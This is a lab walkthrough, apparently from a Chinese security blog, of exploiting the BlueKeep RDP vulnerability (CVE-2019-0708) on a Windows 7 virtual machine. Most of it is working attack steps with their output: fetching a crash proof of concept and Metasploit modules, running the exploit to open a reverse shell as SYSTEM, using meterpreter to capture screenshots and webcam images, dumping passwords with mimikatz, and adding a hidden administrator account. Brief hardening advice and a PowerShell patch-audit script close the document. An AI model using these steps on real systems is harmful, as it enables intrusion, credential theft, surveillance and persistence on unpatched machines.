Environment

Windows7 ultimate sp1 x64
MSF
Enable Remote Desktop:
Disable the firewall:
Exploitation
Early blue-screen PoC
This is an early proof-of-concept for the vulnerability (it only crashes the target)!
git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708
pip3 install impacket
python3 crashpoc.py 192.168.173.136 32    # python3 crashpoc.py <ip address> <system type>
Note: the PoC above does not require the firewall to be disabled in order to crash Win7!
Getting a shell
Download the attack scripts:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
Import the attack scripts into the Metasploit tree:
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Vulnerability detection:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.173.136
set threads 5
run
[*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389 - The target is vulnerable.
[*] 192.168.173.136:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Exploitation:
reload_all    # load the newly imported modules
search cve-2019-0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.173.130
set rport 3389
set target 3    # the victim runs in VMware, so target 3 is used
exploit
[*] Started reverse TCP handler on 192.168.173.1:4444
[*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389 - The target is vulnerable.
[*] 192.168.173.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.173.136:3389 - Surfing channels ...
[*] 192.168.173.136:3389 - Lobbing eggs ...
[*] 192.168.173.136:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 3 opened (192.168.173.1:4444 -> 192.168.173.136:49161) at 2019-09-14 22:50:31 +0800
session 1
session 1
'session' 不是内部或外部命令，也不是可运行的程序或批处理文件。
C:\Windows\system32>whoami
whoami
nt authority\system
# A shell was obtained, running with SYSTEM privileges
# The first exploit attempt blue-screened Win7; the shell was obtained normally on the next run
Meaning of the target values:
- 0: automatic selection based on fingerprinting
- 1: physical machine
- 2: VirtualBox virtual machine
- 3: VMware virtual machine
Privilege escalation
meterpreter > getuid                  # show the current uid
meterpreter > screenshot              # take a screenshot
meterpreter > webcam_snap             # capture a webcam image
meterpreter > load mimikatz           # load the mimikatz extension to recover credentials
meterpreter > wdigest                 # dump system passwords
rdesktop 192.168.173.138              # log in via Remote Desktop
net user root$ root /add
net localgroup administrators root$ /add
The machine used in this experiment is Win7; for Windows Server 2008 the registry must be modified first, otherwise the target blue-screens.
Set the value of [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam] to 0.
Hardening
Affected versions
Windows Server 2008 (R2)
Windows 7 SP1
Windows Server 2003
Windows XP
Temporary hardening
- Block the Remote Desktop port 3389
Hot patch
Reference: Qi'anxin (奇安信) CVE-2019-0708 hot-patch tool user manual
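As an added defender-side example that is not part of the original article, the PowerShell script below audits a Windows 7 SP1 / Server 2008 R2 host for the exposure the scanner output above reports ("Requires NLA: No", port 3389 reachable) and checks whether a fix is installed. The KB identifiers in $fixKBs are assumed to be the May 2019 security-only and monthly-rollup updates for Windows 7 SP1 / Server 2008 R2; extend the list for other versions.

```powershell
# Added example: audit a Windows 7 SP1 / Server 2008 R2 host for CVE-2019-0708 exposure.
# Run from an elevated PowerShell prompt on the host being checked (works on PowerShell 2.0).
$ts  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$tcp = "$ts\WinStations\RDP-Tcp"

# Assumption: security-only and monthly-rollup updates for CVE-2019-0708 on Win7 SP1 / 2008 R2.
$fixKBs = @('KB4499175', 'KB4499164')

function Get-RegValue($Path, $Name) {
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

$os          = Get-WmiObject Win32_OperatingSystem
$rdpEnabled  = (Get-RegValue $ts  'fDenyTSConnections') -eq 0   # 0 = RDP connections allowed
$nlaRequired = (Get-RegValue $tcp 'UserAuthentication') -eq 1   # 1 = Network Level Authentication required
$rdpPort     = Get-RegValue $tcp 'PortNumber'
if (-not $rdpPort) { $rdpPort = 3389 }
$patched     = [bool](Get-HotFix | Where-Object { $fixKBs -contains $_.HotFixID })
# A LISTENING socket on the RDP port means the service is reachable unless the firewall blocks it.
$listening   = [bool](netstat -ano | Select-String ":$rdpPort\s+\S+\s+LISTENING")

$findings = @()
if (-not $patched) {
    $findings += "No CVE-2019-0708 update found (looked for: $($fixKBs -join ', ')); install the update or the hot patch"
}
if ($rdpEnabled -and -not $nlaRequired) {
    # NLA forces authentication before the vulnerable pre-auth channel handling is reached.
    $findings += 'RDP enabled without NLA; enable it: Set-ItemProperty "' + $tcp + '" UserAuthentication 1'
}
if ($listening -and -not $patched) {
    $findings += "Port $rdpPort is listening on an unpatched host; block it: netsh advfirewall firewall add rule " +
                 "name=`"Block RDP $rdpPort`" dir=in action=block protocol=TCP localport=$rdpPort"
}

New-Object PSObject -Property @{
    OSVersion   = $os.Version      # 6.1.7601 is Windows 7 SP1 / Server 2008 R2 SP1
    Caption     = $os.Caption
    RdpEnabled  = $rdpEnabled
    NlaRequired = $nlaRequired
    RdpPort     = $rdpPort
    PatchFound  = $patched
    Listening   = $listening
    Findings    = $findings
} | Format-List
```

An empty Findings list means the host is patched or unreachable on the RDP port; anything else lists the remediation command to run.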
Original article, author: 小嵘源码. If reposting, please credit the source: https://www.lcpttec.com/bluekeep/